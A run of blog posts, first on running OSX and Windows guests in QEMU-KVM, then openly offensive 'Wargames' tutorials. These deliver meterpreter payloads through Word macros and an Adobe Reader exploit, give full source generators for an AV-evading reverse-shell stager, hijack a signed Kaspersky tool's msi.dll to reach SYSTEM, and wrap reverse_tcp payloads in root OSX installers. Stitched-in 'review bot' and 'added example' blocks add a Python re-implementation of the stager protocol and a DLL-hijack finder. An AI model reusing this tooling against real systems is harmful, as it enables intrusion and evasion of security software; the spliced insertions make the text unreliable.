Channel: Astr0baby's not so random thoughts _____ rand() % 100;

Running OSX 10.8.2 in QEMU-KVM


It is always nice to have the ability to run a virtual system to test software written for other platforms. Recently I have moved completely off VirtualBox and use QEMU-KVM only. With a GRSEC/PaX hardened kernel qemu-kvm works fine without any paxctl exceptions on its binaries or any modifications to the kernel config. I have managed to install and run iATKOS ML2, which is a modified OSX 10.8.2 for PCs. The following information might be handy to somebody wishing to virtualize 64-bit OSX for testing.

My software specifications are as follows:

  • OS: Debian stable 64-bit with vanilla kernel 2.6.50 & GRSEC/PaX patches and the kvm_intel module
  • QEMU-KVM version 0.14.1 (please check the notes further on)
  • iATKOS ML2 (no links here, please find your own copy)

I have had the best success with qemu-kvm version 0.14.1 because of the RTL8139 network driver in this version. I had no luck in 1.2.x or 1.1.x getting the virtual network card to work, and earlier versions were also buggy, so stick to this one (it works fine for Windows, Linux, OSX and the BSDs).

Another important thing is that newer OSX releases will not boot on a local APIC whose version register reports 0x11 or lower, and QEMU-KVM 0.14.1 reports APIC version 0x11. No worries, it is open source after all, and a one-line patch fixes this, as shown below. So first download the proper QEMU-KVM version from here: sourceforge.net/projects/kvm/files/qemu-kvm/0.14.1/ or as a direct download: sourceforge.net/projects/kvm/files/qemu-kvm/0.14.1/qemu-kvm-0.14.1.tar.gz/download

Extract the tarball and modify hw/apic.c like this:

user@Obelix:~/qemu-kvm-0.14.1/hw/BACKUP$ diff patched.apic.c apic.c 
737c737
<         val = 0x14 | ((APIC_LVT_NB - 1) << 16); /* version 0x11 */
---
>         val = 0x11 | ((APIC_LVT_NB - 1) << 16); /* version 0x11 */
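Review bot: the comment on the patched line still reads `/* version 0x11 */` while the value is now 0x14; update it to `/* version 0x14 */` so the next reader does not re-apply the patch or mistake the line for unpatched. Also, this diff was produced as `diff patched.apic.c apic.c`, so the `<` line is the new value and the `>` line is the original, the reverse of the usual direction; apply it with `patch -R`, or regenerate it as `diff -u apic.c patched.apic.c` before sharing it.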

Just make sure you change 0x11 to 0x14 on line 737 (the value returned for the APIC version register; the trailing comment can be updated to match). Now run ./configure, make and make install.
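A scripted version of that one-line edit, added here as an example and not part of the original post: it rewrites the version value in a copy of the apic.c text, refreshes the stale comment, and refuses to run when the expected line is missing, duplicated or already patched, which is the check you want before a long qemu build. The SAMPLE excerpt is constructed for the example and patch_file is a convenience wrapper, not anything from the qemu tree.

```python
import re
from pathlib import Path

# Shape of the version-register line in qemu-kvm 0.14.1 hw/apic.c (case 0x30).
_VERSION_LINE = re.compile(
    r"^(?P<indent>[ \t]*)val = 0x(?P<ver>[0-9a-fA-F]{2}) \| \(\(APIC_LVT_NB - 1\) << 16\);"
    r"(?P<rest>.*)$",
    re.MULTILINE,
)


def apic_version(source: str):
    """Current version value in the source text, or None if the line is absent/ambiguous."""
    matches = list(_VERSION_LINE.finditer(source))
    return int(matches[0].group("ver"), 16) if len(matches) == 1 else None


def bump_apic_version(source: str, new_version: int = 0x14) -> str:
    """Return apic.c text with the LAPIC version register value set to new_version.

    Fails loudly instead of silently doing nothing when the expected line is
    missing, appears more than once, or was already patched."""
    matches = list(_VERSION_LINE.finditer(source))
    if len(matches) != 1:
        raise ValueError(f"expected exactly one APIC version line, found {len(matches)}")
    m = matches[0]
    if int(m.group("ver"), 16) == new_version:
        raise ValueError(f"already at version 0x{new_version:02x}")
    # Refresh the trailing "/* version 0x11 */" comment so it does not go stale.
    rest = re.sub(r"version 0x[0-9a-fA-F]{2}", f"version 0x{new_version:02x}", m.group("rest"))
    new_line = f"{m.group('indent')}val = 0x{new_version:02x} | ((APIC_LVT_NB - 1) << 16);{rest}"
    return source[:m.start()] + new_line + source[m.end():]


def patch_file(path: str, new_version: int = 0x14) -> None:
    """Patch hw/apic.c in place, keeping an untouched .orig copy beside it."""
    p = Path(path)
    original = p.read_text()
    Path(str(p) + ".orig").write_text(original)
    p.write_text(bump_apic_version(original, new_version))


# Constructed excerpt of the relevant switch case, not the real file.
SAMPLE = """    case 0x30:
        val = 0x11 | ((APIC_LVT_NB - 1) << 16); /* version 0x11 */
        break;
"""

if __name__ == "__main__":
    print(bump_apic_version(SAMPLE))
```

Run it as `patch_file("hw/apic.c")` from the extracted source tree; a second run raises instead of leaving you wondering whether the build picked up the change.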

Before booting make sure the kvm_intel kernel module is loaded (I am on an Intel CPU and did not try AMD's kvm_amd).

There are some parameters to pass to QEMU-KVM when booting OSX, so here is a quick summary:

qemu-img create -f qcow2 lion.img 20G   (create an empty HDD image for the installation)
kvm -m 1400 -vga vmware lion.img  -cdrom /PATH/TO/ISO.iso -boot d -cpu core2duo -net nic,model=rtl8139,macaddr=10:1f:74:55:11:21 -net user -no-kvm-irqchip

Once you are in the iATKOS boot menu hit F8 and enter these boot parameters:

cpus=1 -v

We are just telling the bootloader to use one CPU and to boot verbosely. You should reach the setup menu, where you create the OSX partition on the empty drive (use Erase with a label) and, before hitting Install, select a few custom options such as the PS/2 drivers (there are actually very few options to choose from in iATKOS ML2).

After installation you can boot OSX like so:

kvm -m 1400 -vga vmware lion.img  -cpu core2duo -net nic,model=rtl8139,macaddr=10:1f:74:55:11:21 -net user -no-kvm-irqchip

And don't forget to press F8 and pass the cpus=1 boot flag again.




Virtio in KVM-QEMU IO


A note to myself:

always use virtio drivers for Windows guests in KVM-QEMU, it improves disk IO greatly.
Here is a quick summary:

- Download the driver ISO from here http://alt.fedoraproject.org/pub/alt/virtio-win/latest/images/
- For a new Windows guest installation prepare the normal qcow2 image
- Boot the installation CD ISO alongside the virtio CD ISO like so:

kvm -vga vmware -m 1024 -drive file=windows7.qcow,cache=none,index=1,if=virtio -drive file=/PATH/TO/ISO/Win7.64.sp1.iso,index=2,media=cdrom -boot d -drive file=/PATH/TO/ISO/virtio-win-0.1-74.iso,index=3,media=cdrom

- In Windows setup choose to load custom disk drivers from the virtio CD-ROM
- Install / reboot
- Boot Windows with the following parameters:

 kvm -vga vmware -m 1024 -drive file=windows7.qcow,cache=none,index=1,if=virtio

For existing qcow images with a Windows system already installed on IDE emulation:
- Boot normally, with the virtio ISO attached as an extra CD-ROM
- Install legacy hardware (Win7: Device Manager, Add legacy hardware) so that the virtio storage driver is registered before the boot disk is switched; switching first gives a 0x7B boot failure
- Install the driver from the virtio CD-ROM
- Shut down Windows
- Boot Windows with the following parameters:

 kvm -vga vmware -m 1024 -drive file=windows7.qcow,cache=none,index=1,if=virtio

The IO performance is much better with the virtio drivers than with the default IDE emulation.

Oh and also good luck and all the best in 0x7DE, we will all need it.


 


Wargames part 1 Delivering payloads by Email



For demonstration purposes let us presume the target is using Windows 8.1 64-bit, MS Office 2010 + Outlook and some form of antivirus protection, in this case Avast NOD32 ver.7.

The Metasploit tools folder has many useful programs, and for this exercise I have chosen the exe2vba.rb script to encode our stealth executable payload as a VBA script:

committer_count.rb    module_author.rb      pack_fastlib.sh
context               module_changelog.rb   pattern_create.rb
convert_31.rb         module_commits.rb     pattern_offset.rb
cpassword_decrypt.rb  module_count.rb       payload.exe
dev                   module_disclodate.rb  payload_lengths.rb
exe2vba.rb            module_license.rb     payload.txt
exe2vbs.rb            module_mixins.rb      pdf2xdp.rb
find_badchars.rb      module_payloads.rb    profile.sh
halflm_second.rb      module_ports.rb       psexec.rb
hmac_sha1_crack.rb    module_rank.rb        reg.rb
import_webscarab.rb   module_reference.rb   verify_datastore.rb
list_interfaces.rb    module_targets.rb     virustotal.rb
lm2ntcrack.rb         msf_irb_shell.rb      vxdigger.rb
memdump               msftidy.rb            vxencrypt.rb
metasm_shell.rb       nasm_shell.rb         vxmaster.rb
user@Obelix:~/stuff/metasploit/tools$

For the executable payload I have used the custom meterpreter loader, which gets past all AVs just fine – Custom Meterpreter Loader

The script output is simple and straightforward. It creates VB source code that needs to be placed as a macro into an MS Word document and saved within the document. The ASCII-encoded executable along with the function header needs to be hidden somewhere in the text itself; the best location is probably a few pages down at the end. (This step should be done on a Windows VM with MS Office.)

Next I have configured a mail system on my host in order to send an email to the VM where the “user” sits. I have used the basic Debian setup :

  • Postfix
  • Courier-pop3d  (Maildir)

I had the default /var/mail/user mailbox format, so I had to change to Maildir in /home/user/Maildir. Postfix is configured to deliver mail locally only, because we will connect with a mail client from the VM to the host's POP3. Just a note: you need to add "home_mailbox = Maildir/" to /etc/postfix/main.cf and create a Maildir structure in your home directory. A mail system can be a little tricky to set up if you haven't done this before. After everything is ready we can test/connect to our new mailbox from Outlook in the VM. I don't use bridging in KVM-QEMU, so with user-mode networking everything that runs on the host is reachable from the VM as IP 10.0.2.2.

Next we simulate a real-life email message from our host. I have used Alpine in the terminal as it suits me best for what I need. As root I mail to user@obelix (in the first part of the video there is a typo in the mail address: user@Oblelix), attach the evil document and send it away.

On the target VM we are using Windows 8.1 64-bit with Avast NOD32 7 and MS Office 2010. In order for the macro to run, the user needs to click the enable button at the top of the document when it is opened directly from Outlook. The payload does its stuff, bypasses the AV and spawns a reverse shell back to our host.

Here is the video summary of Wargames pt.1


Some KVM-Qemu hints and tips


A short summary of useful KVM-Qemu commands and tricks.

Disk images in qcow2 format tend to grow over time as one installs more and more stuff in the VMs. In order to free up space and shrink a qcow2 image, convert it to a new compressed image (-c):

qemu-img convert -c -O qcow2 image.img shrunk.image.img

Test the new image by booting it the usual way and afterwards delete the original image.img.

In order to better control what gets onto the images we can use a backing-file snapshot, i.e. a qcow2 overlay whose unwritten blocks fall through to the base image (this is an external overlay, not an internal qcow2 snapshot):

qemu-img create -f qcow2 -b shrunk.image.img snapshot01.shrunk.image.img

This way you can create as many snapshots as you need. I usually create simple bash scripts to load each VM snapshot, like this:

Snapshot01
kvm -m 1024 -vga std -drive file=snapshot01.shrunk.image.img,cache=none,if=virtio

Snapshot02
kvm -m 1024 -vga std -drive file=snapshot02.shrunk.image.img,cache=none,if=virtio

etc ...

In case you need to revert, just delete the snapshot file and create a new one from the original shrunk.image.img. Never boot or write to the base image itself while overlays depend on it: an overlay only records the blocks changed since it was created, so modifying the base silently corrupts every snapshot built on top of it.

When running Windows guests it is essential to run Samba on the host and dedicate a shared folder that the guests can access. For *nix guests sshd on the host is sufficient as most systems ship with scp. When neither is available, or the VM network does not work, you can still use a raw disk image to copy files over.

Here I will use the example of a small 2 GB USB flash stick.

Let's assume it is formatted with a universally accepted file system (FAT32):

dd if=/dev/sdb1 of=/path/to/kvm/images/disk.raw

Once the raw FAT32 partition from the USB disk is dumped we can mount it locally via the loop device and copy files to/from it:

mount -o loop disk.raw /mnt/usb

When finished, unmount it on the host and attach the image to KVM-Qemu as a secondary IDE/virtio drive. Never keep it loop-mounted on the host while a guest has it attached: two writers on one FAT32 image will corrupt it.

kvm -vga vmware -m 1024 -drive file=snapshot01.shrunk.image.img,cache=none,index=1,if=virtio -drive file=disk.raw,index=2 -boot c

 


Wargames part 2 delivering payloads through PDFs


In another example, let us focus on the popular PDF format. The exploit used in this demo was originally written by WebDEVil and can be downloaded from here: ExploitAdobeReader. This is nothing new, but it is a nice example of how such an attack could be used in a real-world scenario.


Affected versions of Adobe Reader are:

* 11.0.1
* 11.0.0
* 10.1.5
* 10.1.4
* 10.1.3
* 10.1.2
* 10.1
* 9.5

In this example we will download 10.1.4 from OldApps.com and install it in a Windows 7 SP1 64-bit VM.

Next we need to prepare the evil PDF document using the Ruby script from the exploit link above. There is a pretty clear howto regarding the requirements, so I will just repeat it here:

* Run on Windows :-)
* Ruby 1.9.x (http://rubyforge.org/frs/download.php/76752/rubyinstaller-1.9.3-p385.exe)
* Gems: origami and metasm (in a command prompt type: gem install metasm && gem install origami -v "=1.2.5")

Once set up, grab some sample PDF document and experiment. In the Windows testing VM open cmd.exe, go to the working directory where the exploit script is, and execute the following to generate the modified PDF:

ruby xfa_MAGIC.rb -i sample.pdf -p payload.exe -o test.pdf

payload.exe is of course our meterpreter loader (the connect-back executable, not the listener) generated via Custom Meterpreter Loader.

Also note that the CVE-2013-0640/CVE-2013-0641 exploit PDF is flagged by most antivirus vendors by now, but that is beside the point because this is just a demo. For example, F-Secure detects the PDF as Exploit.PDF-JS.OneOfChild.Gen.

Here is a video summary of the whole process



Custom Meterpreter loader DLL


This was actually discovered by pure chance: I wanted to try something with GCC and accidentally compiled Windows C source code as a DLL using the -shared option in MinGW.

Here is another interesting example of how to get past antivirus without being detected. Again this is based on an older article (Customizing Custom Meterpreter Loader) and 95% of the code is from Raphael Mudge's metasploit-loader project located here.

OK, the source code for the generator is almost identical, with some minor differences in the build process.

P.S. A good hint to hide a console application from the Windows GUI: add the -mwindows parameter to gcc, so no console window appears when the application is executed from Explorer, for example:

i586-mingw32msvc-gcc temp.c -o payload.exe -lws2_32 -mwindows

 

#!/bin/bash
clear
echo "****************************************************************"
echo "    Automatic C source code generator - FOR METASPLOIT          "
echo "           Based on rsmudge metasploit-loader                   "
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number : '
read port

echo '#include <stdio.h>'> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo -n 'unsigned char server[]="' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned char serverp[]="' >> temp.c
echo -n $port >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo '    WSADATA    wsaData;' >> temp.c
echo '    WORD    wVersionRequested;' >> temp.c
echo '    wVersionRequested = MAKEWORD(2, 2);'>> temp.c
echo '    if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo '         printf("bad\n"); '>> temp.c
echo '         WSACleanup(); '>> temp.c
echo '        exit(1);'>> temp.c
echo '    }' >> temp.c
echo ' }' >> temp.c
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c
echo '    printf("r %s\n", error);'>> temp.c
echo '    closesocket(my_socket);'>> temp.c
echo '    WSACleanup();'>> temp.c
echo '    exit(1);' >> temp.c
echo ' }' >> temp.c
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo '    int    tret   = 0;'>> temp.c
echo '    int    nret   = 0;'>>temp.c
echo '    void * startb = buffer;'>> temp.c
echo '    while (tret < len) {'>>temp.c
echo '        nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c
echo '        /* check before advancing: a closed peer (0) or error (-1) must not loop forever */'>> temp.c
echo '        if (nret == SOCKET_ERROR || nret == 0)'>> temp.c
echo '            punt(my_socket, "no data");'>> temp.c
echo '        startb = (char *)startb + nret;'>> temp.c
echo '        tret   += nret;'>>temp.c
echo '    }'>>temp.c
echo '    return tret;'>> temp.c
echo '}' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c
echo '    struct hostent *        target;' >> temp.c
echo '    struct sockaddr_in     sock;' >> temp.c
echo '    SOCKET             my_socket;'>>temp.c
echo '    my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c
echo '     if (my_socket == INVALID_SOCKET)'>> temp.c
echo '        punt(my_socket, ".");'>>temp.c
echo '    target = gethostbyname(targetip);'>>temp.c
echo '    if (target == NULL)'>>temp.c
echo '        punt(my_socket, "..");'>>temp.c
echo '    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c
echo '    sock.sin_family = AF_INET;'>> temp.c
echo '    sock.sin_port = htons(port);'>>temp.c
echo '    if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c
echo '         punt(my_socket, "...");'>>temp.c
echo '    return my_socket;'>>temp.c
echo '}' >> temp.c
echo 'int main(int argc, char * argv[]) {' >> temp.c
echo '  FreeConsole();'>>temp.c
echo '    ULONG32 size;'>>temp.c
echo '    char * buffer;'>>temp.c
echo '    void (*function)();'>>temp.c
echo '    winsock_init();'>> temp.c
echo '    SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c
echo '    int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c
echo '    if (count != 4 || size <= 0)'>>temp.c
echo '        punt(my_socket, "error lenght\n");'>>temp.c
echo '    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c
echo '    if (buffer == NULL)'>>temp.c
echo '        punt(my_socket, "error in buf\n");'>>temp.c
echo '    buffer[0] = 0xBF;'>>temp.c
echo '    memcpy(buffer + 1, &my_socket, 4);'>>temp.c
echo '    count = recv_all(my_socket, buffer + 5, size);'>>temp.c
echo '    function = (void (*)())buffer;'>>temp.c
echo '    function();'>>temp.c
echo '    return 0;'>>temp.c
echo '}' >> temp.c
echo 'Compiling C code to Dll ..'
i586-mingw32msvc-gcc  temp.c -o payload.dll -lws2_32 -shared
strip payload.dll
ls -la payload.dll
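The wire format the generated loader speaks is worth seeing on its own, so here is the staging handshake re-implemented in Python as an added example (not part of the original post and not rsmudge's metasploit-loader code): the handler sends a 4-byte little-endian length followed by the raw stage, and the client lays out the buffer the C code hands to VirtualAlloc'd memory, a `mov edi, imm32` carrying the socket handle followed by the stage. The stage bytes and the local socket pair are constructed for the example; the functions and the max_size cap are this example's own choices.

```python
import socket
import struct
import threading

MOV_EDI_IMM32 = 0xBF  # x86 opcode "mov edi, imm32": hands the socket to the stage


def recv_all(sock: socket.socket, length: int) -> bytes:
    """Read exactly `length` bytes; a closed peer raises instead of spinning."""
    chunks, remaining = [], length
    while remaining:
        chunk = sock.recv(remaining)
        if not chunk:
            raise ConnectionError(f"peer closed with {remaining} bytes outstanding")
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def send_stage(sock: socket.socket, stage: bytes) -> None:
    """Handler side: 4-byte little-endian length, then the raw stage."""
    sock.sendall(struct.pack("<I", len(stage)) + stage)


def receive_loader_image(sock: socket.socket, max_size: int = 16 * 1024 * 1024) -> bytes:
    """Client side: rebuild the buffer the C loader jumps into.

    Layout: BF <socket handle, 4 bytes LE> <stage>. Embedding the handle lets the
    stage keep talking on the same connection."""
    (size,) = struct.unpack("<I", recv_all(sock, 4))
    if size == 0 or size > max_size:
        raise ValueError(f"implausible stage size {size}")
    stage = recv_all(sock, size)
    handle = sock.fileno() & 0xFFFFFFFF
    return bytes([MOV_EDI_IMM32]) + struct.pack("<I", handle) + stage


def parse_loader_image(image: bytes):
    """Inverse of the above, e.g. to triage an RWX region recovered from memory."""
    if len(image) < 5 or image[0] != MOV_EDI_IMM32:
        raise ValueError("does not start with mov edi, imm32")
    (handle,) = struct.unpack("<I", image[1:5])
    return handle, image[5:]


def demo(stage: bytes):
    """Handler and client over a local socket pair; returns (handle, stage, client_fd)."""
    handler_sock, client_sock = socket.socketpair()
    t = threading.Thread(target=send_stage, args=(handler_sock, stage))
    t.start()
    image = receive_loader_image(client_sock)
    t.join()
    fd = client_sock.fileno()
    handler_sock.close()
    client_sock.close()
    handle, got = parse_loader_image(image)
    return handle, got, fd


def truncated_stream_is_rejected() -> bool:
    """Edge case: handler dies after the header; the client must not hang or jump."""
    handler_sock, client_sock = socket.socketpair()
    handler_sock.sendall(struct.pack("<I", 64))
    handler_sock.close()
    try:
        receive_loader_image(client_sock)
        return False
    except ConnectionError:
        return True
    finally:
        client_sock.close()


if __name__ == "__main__":
    # Constructed placeholder stage (NOPs and a RET), not real shellcode.
    handle, got, fd = demo(b"\x90" * 8 + b"\xc3")
    print(f"stage of {len(got)} bytes, socket handle {handle} (fd {fd})")
```

The size check and the EOF handling are the two things the bare C loop gets wrong; a detection-side reader of this format needs the same guards before trusting the length field.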

As you can see, we are just adding -shared to the mingw compiler invocation and creating a DLL from the above C code. One would say that this is no way of writing a DLL and it won't work, but it does: when a MinGW build contains no __declspec(dllexport) and no .def file, the linker exports every global function, so main() ends up in the DLL's export table where rundll32 can find it. I will show you just how.

So once the DLL is built, copy it over to your test machine (Windows 8.1 64-bit) and load it; don't forget to start your Metasploit listener on your attacker box first:

rundll32 payload.dll,main


And bingo, we have a reverse shell! At the time of writing no AV detects this.

So now it is time to abuse some signed executables that don't check their DLL paths correctly, and which are trusted by almost everything, of course. So what if the signed exe loads our DLL?

 


Customising Meterpreter Loader DLL part. 2


Today I will show you an interesting example of how to search for DLLs that a signed executable loads from a path we control, so that we can compile our custom Meterpreter DLL loader under that name and let the signed executable execute it.

I have taken the good old Kaspersky removal tool called kavremover. This tool is perfect for this example. As a host system I have Windows 7 SP1 64-bit. What we need is the Sysinternals Suite, most importantly Process Monitor (procmon.exe). So we start procmon.exe and create a filter rule on the process name kavremover.exe, so that only this process is shown for analysis. Next we run kavremover.exe and search for vulnerable DLL paths: CreateFile operations on .dll names that fail with NAME NOT FOUND in a directory we can write to, before the real DLL is found elsewhere. After a while I came across the following DLL that gets searched first in the execution path, i.e. the folder kavremover.exe is started from (in our case the user's desktop):
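Scrolling through procmon by hand works for one binary; for anything bigger the same hunt is a filter over the CSV export. The following is an added example (not part of the original post, not a Sysinternals tool): it reads rows in the column layout of a Process Monitor CSV export, keeps the CreateFile probes for .dll names made by one process, and reports every DLL whose first probe landed in the executable's own directory and failed with NAME NOT FOUND, plus any DLL that was never found anywhere. The SAMPLE_CSV rows are constructed for the example, and the directory and process name are parameters you supply.

```python
import csv
import io
from pathlib import PureWindowsPath

# Constructed rows in the column layout of a Process Monitor CSV export
# (File > Save... > CSV); not a real capture.
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"9:41:03.1","kavremover.exe","3120","CreateFile","C:\\Users\\user\\Desktop\\msi.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:41:03.1","kavremover.exe","3120","CreateFile","C:\\Windows\\SysWOW64\\msi.dll","SUCCESS","Desired Access: Read Attributes"
"9:41:03.2","kavremover.exe","3120","CreateFile","C:\\Windows\\SysWOW64\\version.dll","SUCCESS","Desired Access: Read Attributes"
"9:41:03.2","kavremover.exe","3120","CreateFile","C:\\Users\\user\\Desktop\\dbghelp.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:41:03.2","kavremover.exe","3120","CreateFile","C:\\Windows\\SysWOW64\\dbghelp.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:41:03.3","kavremover.exe","3120","CreateFile","C:\\Users\\user\\Desktop\\report.txt","NAME NOT FOUND","Desired Access: Generic Write"
"9:41:03.3","explorer.exe","1804","CreateFile","C:\\Users\\user\\Desktop\\shell32.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"""


def hijack_candidates(csv_text: str, process: str, exe_dir: str) -> dict:
    """DLL names the given process looked for in exe_dir first and did not find.

    Returns {dll_name: {"first_probe": path, "found_anywhere": bool}}. A name is
    reported when its first CreateFile probe lands in the directory the
    executable runs from and fails with NAME NOT FOUND (a file of that name
    dropped beside the exe wins the search order), and also when no probe for
    it ever succeeds (the process will take whatever we provide)."""
    probes = {}  # lowercase dll name -> [(PureWindowsPath, result), ...] in capture order
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process.lower() or row["Operation"] != "CreateFile":
            continue
        path = PureWindowsPath(row["Path"])
        if path.suffix.lower() != ".dll":
            continue
        probes.setdefault(path.name.lower(), []).append((path, row["Result"]))

    exe_dir_path = PureWindowsPath(exe_dir)  # PureWindowsPath compares case-insensitively
    candidates = {}
    for name, seq in probes.items():
        first_path, first_result = seq[0]
        found_anywhere = any(result == "SUCCESS" for _, result in seq)
        first_probe_in_exe_dir = first_path.parent == exe_dir_path and first_result == "NAME NOT FOUND"
        if first_probe_in_exe_dir or not found_anywhere:
            candidates[name] = {"first_probe": str(first_path), "found_anywhere": found_anywhere}
    return candidates


if __name__ == "__main__":
    for name, info in hijack_candidates(SAMPLE_CSV, "kavremover.exe", r"C:\Users\user\Desktop").items():
        status = "later found elsewhere" if info["found_anywhere"] else "never found"
        print(f"{name}: first probed at {info['first_probe']} ({status})")
```

Two caveats when reading the output: a name on the KnownDLLs list never produces a disk probe, so it cannot appear here at all, and a probe in a directory you cannot write to (Program Files, System32) is not a finding even if it fails.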

So we then look at which functions kavremover.exe imports from msi.dll, and I have found an interesting list here:

There are two functions imported from msi.dll, GetInfo and MsiGetProductInfoA. So let us modify our meterpreter DLL a little and rename the main() function to either GetInfo or MsiGetProductInfoA.

The generator from my previous post produces a binary and a C source file called temp.c. After entering the Metasploit server IP and port number, open temp.c and change the function main() to something like this:

/* Exported under the name kavremover.exe imports from msi.dll. The real
   MsiGetProductInfoA has a different signature (UINT WINAPI with four
   pointer arguments); the caller's arguments are simply ignored here. */
int MsiGetProductInfoA(int argc, char * argv[]) {
    FreeConsole();
    ULONG32 size;
    char * buffer;
    void (*function)();
    winsock_init();
    SOCKET my_socket = wsconnect(server, atoi(serverp));
    int count = recv(my_socket, (char *)&size, 4, 0);
    if (count != 4 || size <= 0)
        punt(my_socket, "error length\n");
    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
        punt(my_socket, "error in buf\n");
    buffer[0] = 0xBF;                    /* mov edi, <socket> so the stage reuses the connection */
    memcpy(buffer + 1, &my_socket, 4);
    count = recv_all(my_socket, buffer + 5, size);
    function = (void (*)())buffer;
    function();
    return 0;
}

Please note that if you use int GetInfo() kavremover.exe will crash and we won't get a reverse shell, so use MsiGetProductInfoA. This works just fine; the whole program won't load properly of course, because our export does not behave like the real API, but it gets the job done. Once modified, compile temp.c:


i586-mingw32msvc-gcc  temp.c -o payload.dll -lws2_32 -shared
strip payload.dll
mv payload.dll msi.dll

Next we upload the final msi.dll to the virtual testing system, next to where kavremover.exe is waiting. Start your favourite reverse shell handler via Metasploit and wait for the shell to pop up once kavremover.exe is executed.

kavremover.exe is digitally signed, so in many cases our DLL will get loaded just fine, thus bypassing many sandbox techniques (like Comodo AV) and allowing us to elevate to NT AUTHORITY\SYSTEM.


Here is a short video of the whole process

Also here is a short video demonstrating the attack against a fully updated Windows 8.1 64-bit with active Windows Defender (kinda lame, but nevertheless)…

And now to think what could possibly go wrong… (Win 8.1 64-bit + Comodo AV Advanced 6)


64bit OSX hacking with Metasploit


In the previous articles I described how to install and run 64-bit OSX in KVM (in this example it is Mountain Lion 10.8.2). Now let us focus on a simple exercise: creating an installer via Iceberg which contains a meterpreter payload that gets executed once it is installed on the target. I have also installed an antivirus for OSX; according to some online reviews there are a few products that boast high ratings, one of them being Trend Micro Titanium. Also note that I have no firewall set up on the OSX.

There is a previous article describing a very similar approach for an old 32-bit 10.6.x OSX here: http://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit

In this test I have installed Trend Micro Titanium on OSX 10.8.2 and prepared an installer containing a Java meterpreter payload. Here is a simple shell script to make things easier:

#!/bin/bash
clear
echo "************************************************************"
echo "   Automatic  Java Meterpreter generator - FOR METASPLOIT   "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir ShellCode
./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar  
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."

So next let us copy test.jar over to the virtualized OSX and load Iceberg. There is a video demonstration at the end that describes the whole process. Setting up Iceberg is very easy, just make sure you have the jar meterpreter file handy and the loader script, which should be as follows:

#!/bin/sh
/usr/bin/java -jar /Applications/Utilities/test.jar

I have chosen the application path /Applications/Utilities/ for the jar file to be installed in, and a postupgrade or postinstall script that launches test.jar while the installer runs. Also, while creating the Iceberg installer, make sure that "Requires Admin" is checked, otherwise you won't get root privileges. Here are some screenshots:

Once you compile the project, the installer located in /Users/user/Test (or whatever you have called the project) can be executed. I have also created a simple shell script for the Metasploit listener:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler  PAYLOAD=java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=$port  E

So once we execute the pkg installer a root meterpreter shell pops up. Trend Micro Titanium seems to be happy with it.

So the Java meterpreter payload works well; how about native reverse TCP shell payloads for 64-bit OSX? They don't work with a loader like the one below: the shellcode lives in a writable, non-executable data segment (the micro[] array) and 64-bit OSX enforces NX, so calling into it faults. I have tested it here with the following C source generator:

#!/bin/bash
clear
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir ShellCode
./msfpayload   osx/x64/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x64/xor  > test.c
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp.c 
cat ready.c >> temp.c 
echo ";" >> temp.c
echo "int main(void) { ((void (*)())micro)();" >> temp.c 
echo "}" >> temp.c  
mv temp.c final.c
echo "final.c is ready in ShellCode, please compile it usig gcc on OSX"
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 
cd ..

Once we copy final.c over to OSX we can compile it with GCC and execute it, but all I get is a bus error:

So with this kind of loader we are pretty much stuck with the Java meterpreter payload for 64-bit OSX systems; a native stub would have to copy the shellcode into an executable mapping (mmap with PROT_EXEC) instead of calling into a global array.

Interesting Trend Micro Titanium processes on the OSX:

ps aux | grep Trend
